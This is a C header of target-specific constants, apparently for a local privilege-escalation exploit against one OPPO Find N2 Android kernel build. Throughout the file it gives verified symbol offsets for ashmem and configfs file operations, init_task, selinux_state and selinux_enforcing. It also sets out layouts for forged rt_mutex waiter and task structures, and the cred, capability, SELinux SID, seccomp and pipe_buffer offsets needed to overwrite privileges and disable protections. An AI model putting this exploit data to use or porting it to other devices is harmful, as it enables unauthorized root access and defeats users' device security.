#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "oppo_find_n2_16.0.12.0"
#define BUILD_FINGERPRINT "OPPO/CPH2413/CPH2413:16/UP1A.231005.007/V16.0.12.0.UNFCNXM:user/release-keys"

/* 39-bit VA: CONFIG_ARM64_VA_BITS=39 */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL  /* vmlinux-to-elf _text */
#define P0_PAGE_OFFSET 0xffffff8000000000ULL   /* 39-bit VA direct map */
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL      /* XBL firmware verified */
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL  /* 39-bit VA direct map start */
#define KERNELSNITCH_IDENTITY_END 0xffffffc000000000ULL    /* 39-bit VA direct map end (16GB) */
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffffc000000000ULL               /* 39-bit VA: 16GB direct map */
#define VMEMMAP_START 0xfffffffe00000000ULL                /* 39-bit VA vmemmap */

#define PSELECT_WAITER_WORD_SHIFT 0

/* 符号偏移 (IDA MCP verified from miscdevice + fops structure) */
#define ASHMEM_MISC_FOPS_OFF 0x022c0048ULL   /* ✓ IDA: miscdevice @ 0x291A8D8 fops_ptr = 0xffffffc00a2c0048 */
#define ASHMEM_FOPS_OFF 0x022c0048ULL         /* ✓ IDA: same as ASHMEM_MISC_FOPS */
#define ASHMEM_IOCTL_OFF 0x011ee6ecULL        /* ✓ IDA: func entry sub_11EE6EC */
#define ASHMEM_COMPAT_IOCTL_OFF 0x011ee7d0ULL /* ✓ IDA: func entry sub_11EE7D0 */
#define ASHMEM_MMAP_OFF 0x011ee7d0ULL         /* ✓ IDA: func entry sub_11EE7D0 (same as compat_ioctl in this binary) */
#define ASHMEM_OPEN_OFF 0x011ef340ULL         /* ✓ IDA: func entry sub_11EF340 */
#define ASHMEM_RELEASE_OFF 0x011ef580ULL      /* ✓ IDA: func entry sub_11EF580 */
#define ASHMEM_SHOW_FDINFO_OFF 0x011ef620ULL  /* ✓ IDA: func entry sub_11EF620 */
#define CONFIGFS_READ_ITER_OFF 0x006b038cULL  /* ✓ IDA: func entry sub_6B038C */
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x006b050cULL /* ✓ IDA: func entry sub_6B050C */
#define COPY_SPLICE_READ_OFF 0x005e6830ULL    /* ✓ IDA: func entry sub_5E6830 */
#define NOOP_LLSEEK_OFF 0x0056cf68ULL         /* ✓ IDA: func entry sub_56CF68 (exact match) */
#define INIT_TASK_OFF 0x027cc000ULL          /* ✓ vmlinux-to-elf nm */
#define INIT_UTS_NS_OFF 0x027cbda8ULL        /* ✓ vmlinux-to-elf nm */
#define EMPTY_ZERO_PAGE_OFF 0x029c3000ULL    /* ✓ vmlinux-to-elf nm */
#define ROOT_TASK_GROUP_OFF 0x029c8040ULL    /* ✓ vmlinux-to-elf nm */
#define SELINUX_BLOB_SIZES_OFF 0x02302bc0ULL /* ✓ vmlinux-to-elf nm */
#define SELINUX_STATE_OFF 0x02a793c8ULL      /* ✓ vmlinux-to-elf nm */
#define SELINUX_ENFORCING_OFF 0x02774c84ULL  /* ✓ vmlinux-to-elf nm */
#define SECURITY_HOOK_HEADS_OFF 0x02302528ULL /* ✓ vmlinux-to-elf nm */
#define KMALLOC_CACHES_OFF 0x02302060ULL     /* ✓ vmlinux-to-elf nm */
#define ANON_PIPE_BUF_OPS_OFF 0x0216aa68ULL  /* ✓ IDA output.elf verified */
#define INIT_NET_OFF 0x02924280ULL           /* ✓ vmlinux-to-elf nm */
#define INIT_NSPROXY_OFF 0x027e0a80ULL       /* ✓ vmlinux-to-elf nm */

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_UTS_NS (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_STATE (KIMAGE_TEXT_BASE + SELINUX_STATE_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

/* SLIDE 偏移 */
#define SLIDE_NFULNL_LOGGER_OFF 0x027c14b8ULL
#define SLIDE_LOGGERS_0_1_OFF 0x027c14b8ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02b99b6dULL
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_SYSCTL_BOOTID_OFF 0x02b99b6dULL

#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

#define WAITER_LOCAL_OFF 0x50  /* kernel 5.10: rt_mutex_waiter 80 bytes */
#define WAITER_TREE_ENTRY_OFF 0x00
#define WAITER_PI_TREE_ENTRY_OFF 0x18
#define WAITER_TASK_OFF 0x30
#define WAITER_LOCK_OFF 0x38
#define WAITER_WAKE_STATE_OFF -1  /* kernel 5.10: 无此字段 */
#define WAITER_PRIO_OFF 0x40
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF -1  /* kernel 5.10: 无此字段 */

#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF -1  /* kernel 5.10: 无此字段 */
#define FAKE_WAITER_WW_CTX_OFF -1  /* kernel 5.10: 无此字段 */

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950

#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100

#define MM_OWNER_OFF 1032
#define TASK_PID_OFF 0x618
#define TASK_TGID_OFF 0x61c
#define TASK_REAL_PARENT_OFF 0x628
#define TASK_ATOMIC_FLAGS_OFF 0x5d8
#define TASK_REAL_CRED_OFF 0x818
#define TASK_CRED_OFF 0x820
#define TASK_COMM_OFF 0x830
#define TASK_TASKS_OFF 0x550
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x8e8
#define TASK_PI_BLOCKED_ON_OFF 0x898   /* ✓ IDA verified: rt_mutex_adjust_prio_chain LDR X28, [X19,#0x898] */

#define CRED_UID_OFF 8
#define CRED_SECUREBITS_OFF 40
#define CRED_CAPS_OFF 48
#define CRED_SECURITY_OFF 128
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30

#define PIPE_BUFFER_SIZE 0x28
#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_INODE_INFO_STRUCT_SIZE 0xb8
#define PIPE_INODE_INFO_SIZE 0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF 0x60
#define PIPE_TAIL_OFF 0x64
#define PIPE_MAX_USAGE_OFF 0x68
#define PIPE_RING_SIZE_OFF 0x6c
#define PIPE_NR_ACCOUNTED_OFF 0x70
#define PIPE_READERS_OFF 0x74
#define PIPE_WRITERS_OFF 0x78
#define PIPE_FILES_OFF 0x7c
#define PIPE_TMP_PAGE_OFF 0x90
#define PIPE_BUFS_OFF 0xa8
#define PIPE_USER_OFF 0xb0

#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc0
#define FOPS_SHOW_FDINFO_OFF 0xe0

#endif
